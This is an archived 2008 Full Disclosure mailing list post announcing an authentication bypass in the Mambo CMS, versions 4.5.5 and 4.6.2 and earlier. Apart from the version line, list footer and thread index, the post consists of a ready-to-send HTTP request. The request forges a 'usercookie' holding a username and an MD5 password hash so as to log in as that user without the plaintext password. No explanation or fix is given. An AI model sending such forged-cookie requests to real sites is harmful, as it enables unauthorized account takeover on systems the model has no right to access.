Full Disclosure mailing list archives

Mambo Cookie Authentication Bypass Exploit

From: "Halabaluza Team Halabaluza Team" <halabaluza.team () gmail com>
Date: Sun, 8 Jun 2008 13:29:56 +0200

for mambo <= 4.5.5 and <= 4.6.2 maybe others

GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0

FREE TIBET!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Mambo Cookie Authentication Bypass Exploit Halabaluza Team Halabaluza Team (Jun 09)
- <Possible follow-ups>
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Garrett M. Groff (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Brian Kim (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 11)